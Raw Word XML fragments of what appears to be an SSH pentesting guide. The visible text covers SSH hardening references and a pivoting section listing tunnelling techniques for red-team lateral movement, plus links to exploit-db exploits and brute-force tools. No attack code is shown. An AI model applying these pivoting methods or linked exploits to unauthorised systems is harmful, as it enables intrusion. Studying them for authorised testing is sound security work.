          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>SSH Security guidelines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6C2B28"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Mozilla is giving recommendations to help secure an OpenSSH server in </w:t>
      </w:r>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>this reference guide</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC057F9"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Best current practices regarding secure SSH configuration are also given in a guide called </w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:anchor="ssh" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Applied Crypto Hardening</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t xml:space="preserve">. Currently examples of configuration </w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>are given for OpenSSH, Cisco ASA and Cisco IOS. The </w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>source</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> of the guide is also available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FBDF5F"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textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Pivoting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B5195A"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8ED1FC"/>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In 2019, I published an article about network pivoting </w:t>
      </w:r>
      <w:hyperlink r:id="rId42" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Etat de l’art du pivoting réseau en 2019</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> [fr-FR].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539A635E"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This article addresses the following topics that are related to SSH:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E2E689" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>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SSH local port forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB30A5B" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>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SSH reverse remote port forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A1372D" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>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SSH dynamic port forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCE8566" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>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SSH reverse remote port forwarding + proxy SOCKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E081E8" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>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VPN over SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE471AE" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>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sshuttle – Transparent proxy over ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE9F63B" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        <w:spacing w:after="0" w:line="450" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>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Chisel – HTTP tunnel via SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D97FCFD"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after="30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color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Those methods are helpful for a professional red teamer to make lateral movement in the target network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD161A7" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="15" w:color="auto"/>
          <w:left w:val="single" w:sz="2" w:space="23" w:color="auto"/>
          <w:bottom w:val="single" w:sz="2" w:space="15" w:color="auto"/>
          <w:right w:val="single" w:sz="2" w:space="23" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        <w:spacing w:after="0" w:line="450" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>This is a community article.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> If you want to chat to other cyber security experts, contribute articles or collaborate with us, join our </w:t>
      </w:r>
      <w:hyperlink r:id="rId43" w:history="1">
        <w:r w:rsidRPr="006F2E38">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="057DFF"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Discord channel by clicking here.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D9C4BAA" w14:textId="77777777" w:rsidR="006F2E38" w:rsidRPr="006F2E38" w:rsidRDefault="006F2E38" w:rsidP="006F2E38">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textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2E38">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>About the author</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ACEFF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27D87"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D2BC0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E097AEB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9A649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15278AF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4CA6D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2C4752E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="69F20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B8077A5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7DF0C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354594F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E806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B440FA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="13564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51"/>
    <w:rsid w:val="006F2E38"/>
    <w:rsid w:val="007F7451"/>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00A5-CB7C-44E4-B256-62CD70EB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70999">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1080981787">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            <w:left w:val="single" w:sz="2" w:space="31" w:color="auto"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="74593022">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="191849258">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                    <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1195312292">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1101296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8204030">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                    <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                    <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                    <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="915940246">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1923299116">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                            <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                            <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                          </w:divBdr>
                        </w:div>
                      </w:divsChild>
                    </w:div>
                    <w:div w:id="1629314949">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="480"/>
                      <w:marBottom w:val="480"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1595479264">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="single" w:sz="2" w:space="11" w:color="auto"/>
                            <w:left w:val="single" w:sz="2" w:space="14" w:color="auto"/>
                            <w:bottom w:val="single" w:sz="2" w:space="14" w:color="auto"/>
                            <w:right w:val="single" w:sz="2" w:space="14" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1360202145">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="9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urity@turgensec.com" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.itefix.net/copssh" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wolfssl.com/products/wolfssh/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.libssh.org/security/advisories/CVE-2018-10933.txt" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://infosec.mozilla.org/guidelines/openssh" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.metasploit.com/" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470/ref=as_li_ss_tl?&amp;hvadid=310913487979&amp;hvpos=1o1&amp;hvnetw=g&amp;hvrand=8783653603300561519&amp;hvpone=&amp;hvptwo=&amp;hvqmt=&amp;hvdev=c&amp;hvdvcmdl=&amp;hvlocint=&amp;hvlocphy=9045957&amp;hvtargid=pla-490871754939&amp;psc=1&amp;th=1&amp;psc=1&amp;linkCode=ll1&amp;tag=turgen-20&amp;linkId=07fb8b8c94849821380f9f4e955ec549&amp;language=en_US" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://turgensec.com/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.chiark.greenend.org.uk/~sgtatham/putty/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ropensci/ssh" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10933" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.corelan.be/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/46516" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/garnier-quentin/perl-libssh/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/paramiko/paramiko" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.vegardno.net/2017/03/fuzzing-openssh-daemon-using-afl.html" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BetterCrypto/Applied-Crypto-Hardening" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://community.turgensec.com/ssh-pentesting-guide-content-bounty/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://matt.ucc.asn.au/dropbear/dropbear.html" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nmap/ncrack" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://community.turgensec.com/cyber-security-books/" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/45233" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bettercrypto.org/"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github.com/ParallelSSH/ssh-python" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://foofus.net/goons/jmk/medusa/medusa.html" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/auxiliary/fuzzers/ssh/ssh_version_2" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/45001" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.openssh.org/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mina.apache.org/sshd-project/index.html" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/arthepsy/ssh-audi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turgensec.com/ssh-hacking-guide/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.libssh.org/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/vanhauser-thc/thc-hydra" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://packetstormsecurity.com/files/download/71252/sshfuzz.txt" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/salesforce/hassh" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/18557" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.gg/RZXRx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4148</Words>
  <Characters>23646</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>197</Lines>
  <Paragraphs>55</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>27739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2020-09-27T06:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-27T06:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>